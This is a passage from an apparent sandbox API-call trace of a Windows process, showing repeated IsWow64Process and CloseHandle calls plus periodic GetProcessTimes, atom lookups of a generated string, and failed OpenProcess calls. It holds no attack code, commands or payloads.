	[0131.767] CloseHandle (hObject=0x2dc) returned 1
	[0131.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.767] CloseHandle (hObject=0x2dc) returned 1
	[0131.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.767] CloseHandle (hObject=0x2dc) returned 1
	[0131.767] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.767] CloseHandle (hObject=0x2dc) returned 1
	[0131.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.768] CloseHandle (hObject=0x2dc) returned 1
	[0131.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.768] CloseHandle (hObject=0x2dc) returned 1
	[0131.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.768] CloseHandle (hObject=0x2dc) returned 1
	[0131.768] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.768] CloseHandle (hObject=0x2dc) returned 1
	[0131.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.769] CloseHandle (hObject=0x2dc) returned 1
	[0131.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.769] CloseHandle (hObject=0x2dc) returned 1
	[0131.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.769] CloseHandle (hObject=0x2dc) returned 1
	[0131.769] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.769] CloseHandle (hObject=0x2dc) returned 1
	[0131.770] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.770] CloseHandle (hObject=0x2dc) returned 1
	[0131.770] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.770] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.770] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.770] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.771] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.771] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.771] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.771] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.771] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.771] CloseHandle (hObject=0x2dc) returned 1
	[0131.771] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.771] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.772] CloseHandle (hObject=0x2dc) returned 1
	[0131.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.772] CloseHandle (hObject=0x2dc) returned 1
	[0131.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.772] CloseHandle (hObject=0x2dc) returned 1
	[0131.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.772] CloseHandle (hObject=0x2dc) returned 1
	[0131.772] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.772] CloseHandle (hObject=0x2dc) returned 1
	[0131.805] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.805] CloseHandle (hObject=0x2dc) returned 1
	[0131.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.806] CloseHandle (hObject=0x2dc) returned 1
	[0131.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.806] CloseHandle (hObject=0x2dc) returned 1
	[0131.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.806] CloseHandle (hObject=0x2dc) returned 1
	[0131.806] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.806] CloseHandle (hObject=0x2dc) returned 1
	[0131.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.807] CloseHandle (hObject=0x2dc) returned 1
	[0131.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.807] CloseHandle (hObject=0x2dc) returned 1
	[0131.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.807] CloseHandle (hObject=0x2dc) returned 1
	[0131.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.807] CloseHandle (hObject=0x2dc) returned 1
	[0131.807] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.808] CloseHandle (hObject=0x2dc) returned 1
	[0131.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.808] CloseHandle (hObject=0x2dc) returned 1
	[0131.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.808] CloseHandle (hObject=0x2dc) returned 1
	[0131.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.808] CloseHandle (hObject=0x2dc) returned 1
	[0131.808] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.809] CloseHandle (hObject=0x2dc) returned 1
	[0131.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.809] CloseHandle (hObject=0x2dc) returned 1
	[0131.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.809] CloseHandle (hObject=0x2dc) returned 1
	[0131.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.809] CloseHandle (hObject=0x2dc) returned 1
	[0131.809] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.809] CloseHandle (hObject=0x2dc) returned 1
	[0131.810] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.810] CloseHandle (hObject=0x2dc) returned 1
	[0131.810] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.810] CloseHandle (hObject=0x2dc) returned 1
	[0131.810] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.810] CloseHandle (hObject=0x2dc) returned 1
	[0131.810] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.810] CloseHandle (hObject=0x2dc) returned 1
	[0131.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.811] CloseHandle (hObject=0x2dc) returned 1
	[0131.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.811] CloseHandle (hObject=0x2dc) returned 1
	[0131.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.811] CloseHandle (hObject=0x2dc) returned 1
	[0131.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.811] CloseHandle (hObject=0x2dc) returned 1
	[0131.811] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.811] CloseHandle (hObject=0x2dc) returned 1
	[0131.812] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.812] CloseHandle (hObject=0x2dc) returned 1
	[0131.812] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.812] CloseHandle (hObject=0x2dc) returned 1
	[0131.812] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.812] CloseHandle (hObject=0x2dc) returned 1
	[0131.812] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.813] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.813] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.813] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.813] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.813] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.814] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.814] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.814] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.814] CloseHandle (hObject=0x2dc) returned 1
	[0131.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.814] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.814] CloseHandle (hObject=0x2dc) returned 1
	[0131.814] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.814] CloseHandle (hObject=0x2dc) returned 1
	[0131.815] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.815] CloseHandle (hObject=0x2dc) returned 1
	[0131.815] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.815] CloseHandle (hObject=0x2dc) returned 1
	[0131.815] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.815] CloseHandle (hObject=0x2dc) returned 1
	[0131.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.848] CloseHandle (hObject=0x2dc) returned 1
	[0131.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.848] CloseHandle (hObject=0x2dc) returned 1
	[0131.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.848] CloseHandle (hObject=0x2dc) returned 1
	[0131.848] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.848] CloseHandle (hObject=0x2dc) returned 1
	[0131.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.849] CloseHandle (hObject=0x2dc) returned 1
	[0131.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.849] CloseHandle (hObject=0x2dc) returned 1
	[0131.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.849] CloseHandle (hObject=0x2dc) returned 1
	[0131.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.849] CloseHandle (hObject=0x2dc) returned 1
	[0131.849] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.850] CloseHandle (hObject=0x2dc) returned 1
	[0131.850] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.850] CloseHandle (hObject=0x2dc) returned 1
	[0131.850] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.850] CloseHandle (hObject=0x2dc) returned 1
	[0131.850] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.850] CloseHandle (hObject=0x2dc) returned 1
	[0131.850] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.850] CloseHandle (hObject=0x2dc) returned 1
	[0131.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.851] CloseHandle (hObject=0x2dc) returned 1
	[0131.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.851] CloseHandle (hObject=0x2dc) returned 1
	[0131.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.851] CloseHandle (hObject=0x2dc) returned 1
	[0131.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.851] CloseHandle (hObject=0x2dc) returned 1
	[0131.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.852] CloseHandle (hObject=0x2dc) returned 1
	[0131.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.852] CloseHandle (hObject=0x2dc) returned 1
	[0131.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.852] CloseHandle (hObject=0x2dc) returned 1
	[0131.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.852] CloseHandle (hObject=0x2dc) returned 1
	[0131.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.852] CloseHandle (hObject=0x2dc) returned 1
	[0131.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.853] CloseHandle (hObject=0x2dc) returned 1
	[0131.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.853] CloseHandle (hObject=0x2dc) returned 1
	[0131.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.853] CloseHandle (hObject=0x2dc) returned 1
	[0131.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.853] CloseHandle (hObject=0x2dc) returned 1
	[0131.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.854] CloseHandle (hObject=0x2dc) returned 1
	[0131.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.854] CloseHandle (hObject=0x2dc) returned 1
	[0131.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.854] CloseHandle (hObject=0x2dc) returned 1
	[0131.854] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.854] CloseHandle (hObject=0x2dc) returned 1
	[0131.855] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.855] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0131.855] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0131.855] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.855] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0131.856] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0131.856] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0131.856] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0131.856] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0131.856] CloseHandle (hObject=0x2dc) returned 1
	[0131.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0131.856] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.856] CloseHandle (hObject=0x2dc) returned 1
	[0131.857] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.857] CloseHandle (hObject=0x2dc) returned 1
	[0131.857] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.857] CloseHandle (hObject=0x2dc) returned 1
	[0131.857] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.857] CloseHandle (hObject=0x2dc) returned 1
	[0131.857] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0131.857] CloseHandle (hObject=0x2dc) returned 1
	[0132.077] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.077] CloseHandle (hObject=0x2dc) returned 1
	[0132.078] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.078] CloseHandle (hObject=0x2dc) returned 1
	[0132.078] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.078] CloseHandle (hObject=0x2dc) returned 1
	[0132.078] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.078] CloseHandle (hObject=0x2dc) returned 1
	[0132.078] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.078] CloseHandle (hObject=0x2dc) returned 1
	[0132.078] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.078] CloseHandle (hObject=0x2dc) returned 1
	[0132.079] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.079] CloseHandle (hObject=0x2dc) returned 1
	[0132.079] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.079] CloseHandle (hObject=0x2dc) returned 1
	[0132.079] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.079] CloseHandle (hObject=0x2dc) returned 1
	[0132.079] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.079] CloseHandle (hObject=0x2dc) returned 1
	[0132.080] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.080] CloseHandle (hObject=0x2dc) returned 1
	[0132.080] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.080] CloseHandle (hObject=0x2dc) returned 1
	[0132.080] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.080] CloseHandle (hObject=0x2dc) returned 1
	[0132.080] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.080] CloseHandle (hObject=0x2dc) returned 1
	[0132.080] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.080] CloseHandle (hObject=0x2dc) returned 1
	[0132.081] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.081] CloseHandle (hObject=0x2dc) returned 1
	[0132.081] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.081] CloseHandle (hObject=0x2dc) returned 1
	[0132.081] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.081] CloseHandle (hObject=0x2dc) returned 1
	[0132.081] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.081] CloseHandle (hObject=0x2dc) returned 1
	[0132.082] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.082] CloseHandle (hObject=0x2dc) returned 1
	[0132.082] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.082] CloseHandle (hObject=0x2dc) returned 1
	[0132.082] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.082] CloseHandle (hObject=0x2dc) returned 1
	[0132.082] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.082] CloseHandle (hObject=0x2dc) returned 1
	[0132.083] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.083] CloseHandle (hObject=0x2dc) returned 1
	[0132.083] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.083] CloseHandle (hObject=0x2dc) returned 1
	[0132.083] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.083] CloseHandle (hObject=0x2dc) returned 1
	[0132.083] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.083] CloseHandle (hObject=0x2dc) returned 1
	[0132.083] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.084] CloseHandle (hObject=0x2dc) returned 1
	[0132.084] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.084] CloseHandle (hObject=0x2dc) returned 1
	[0132.084] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.084] CloseHandle (hObject=0x2dc) returned 1
	[0132.085] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.085] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0132.085] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0132.085] wsprintfA (in: param_1=0x3993380, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0132.085] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.086] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0132.086] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0132.086] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0132.086] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0132.086] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.086] CloseHandle (hObject=0x2dc) returned 1
	[0132.086] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.086] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.086] CloseHandle (hObject=0x2dc) returned 1
	[0132.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.087] CloseHandle (hObject=0x2dc) returned 1
	[0132.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.087] CloseHandle (hObject=0x2dc) returned 1
	[0132.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.087] CloseHandle (hObject=0x2dc) returned 1
	[0132.087] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.087] CloseHandle (hObject=0x2dc) returned 1
	[0132.122] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.122] CloseHandle (hObject=0x2dc) returned 1
	[0132.122] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.122] CloseHandle (hObject=0x2dc) returned 1
	[0132.122] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.122] CloseHandle (hObject=0x2dc) returned 1
	[0132.122] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.123] CloseHandle (hObject=0x2dc) returned 1
	[0132.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.123] CloseHandle (hObject=0x2dc) returned 1
	[0132.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.123] CloseHandle (hObject=0x2dc) returned 1
	[0132.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.123] CloseHandle (hObject=0x2dc) returned 1
	[0132.123] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.123] CloseHandle (hObject=0x2dc) returned 1
	[0132.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.124] CloseHandle (hObject=0x2dc) returned 1
	[0132.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.124] CloseHandle (hObject=0x2dc) returned 1
	[0132.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.124] CloseHandle (hObject=0x2dc) returned 1
	[0132.124] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.124] CloseHandle (hObject=0x2dc) returned 1
